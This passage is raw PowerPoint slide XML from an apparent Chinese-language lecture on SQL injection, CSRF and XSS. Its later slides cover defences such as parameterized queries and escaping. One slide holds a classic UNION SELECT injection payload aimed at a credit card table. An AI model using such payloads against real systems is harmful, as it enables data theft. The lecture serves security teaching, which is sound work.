                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>SQL Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4625875"/>
            <a:ext cx="8648521" cy="1908215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="344488" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	month = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“′ AND 1=0</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		UNION SELECT   name,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CC_num</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exp_mon</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exp_year</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		FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creditcards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5FD3F5-7D2D-40EC-9480-634F451EAD9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="425091"/>
            <a:ext cx="2933700" cy="2335924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="990304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2" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>三种最普遍的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693683" y="1409700"/>
            <a:ext cx="7924800" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>浏览器向服务器发送恶意的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>错误的输入检查导致恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>跨站请求伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Bad web site sends browser request to good web site, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using credentials of an innocent victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Bad web site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sends innocent victim a script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>that steals information from an honest web site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4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4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4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4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4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4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4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3010" name="Picture 2" descr="7842f0803"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="949325" y="1295400"/>
            <a:ext cx="6594475" cy="4667423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2514600"/>
            <a:ext cx="2735263" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Credit Card Info </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Compromised</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35090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0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2"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609600" y="533400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8001000" cy="3581400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用参数化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符转义</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bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="3733800"/>
            <a:ext cx="6629400" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg"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ahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306626" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="228600"/>
            <a:ext cx="7696200" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>参数化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>预处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306627" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643759" y="1295400"/>
            <a:ext cx="8382000" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通过转义相关字符来构建正确的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   \′</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>参数化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL:    (ASP.NET 1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>确保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>参数被正确地转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	"SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE 	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
